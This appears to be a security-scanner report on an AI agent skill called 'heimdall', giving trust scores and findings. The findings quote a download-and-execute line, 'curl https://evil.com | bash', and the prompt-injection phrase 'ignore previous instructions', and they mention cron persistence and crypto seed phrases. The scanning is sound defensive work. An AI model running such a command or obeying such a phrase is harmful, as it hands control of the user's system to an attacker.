heimdall
heimdall · v · by
62.8
Trust Score
0
Trust Tier
danger
Badge
Score Breakdown
| Factor | Score | Weight |
|---|---|---|
| Static | 0.0 | 15% |
| Permission | 95.0 | 15% |
| Poison | 60.0 | 15% |
| Clickfix | 100.0 | 15% |
| Credential | 100.0 | 15% |
| Twostage | 5.0 | 10% |
| Infrastructure | 75.0 | 5% |
| Typosquat | 100.0 | 5% |
| Age | 10.6 | 3% |
| Popularity | 0.0 | 2% |
Scan Results
STATIC — Score: 0
[CRITICAL] Remote code download and execution via curl pipe
(line 91)
Match: curl https://evil.com | bash
[HIGH] Prompt injection or system override attempt
(line 67)
- **impersonation**: "ignore previous instructions"
[CRITICAL] Hidden download from suspicious domain
(line 91)
Match: curl https://evil.com | bash
[CRITICAL] Remote script download piped to shell execution
(line 91)
Match: curl https://evil.com | bash
[MEDIUM] Cron job installation or modification
(line 72)
- **persistence**: crontab, bashrc modifications
[MEDIUM] References to cryptocurrency seed/recovery phrases
(line 66)
- **crypto_wallet**: BTC/ETH addresses, seed phrases
PERMISSION — Score: 95
[LOW] Skill appears to use network but declares no permissions
POISON — Score: 60
[CRITICAL] Classic prompt injection: ignore previous instructions
(line 67)
- **impersonation**: "ignore previous instructions"
CLICKFIX — Score: 100
No findings.
INFRASTRUCTURE — Score: 75
[HIGH] Random-looking subdomain pattern (DGA-like, possible C2)
(line 142)
- [Simon Willison - Moltbook Security Analysis](https://simonwillison.net/2026/Jan/30/moltbook/)
TWOSTAGE — Score: 5
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 91)
Match: curl https://evil.com | bash
CREDENTIAL — Score: 100
No findings.
TYPOSQUAT — Score: 100
No findings.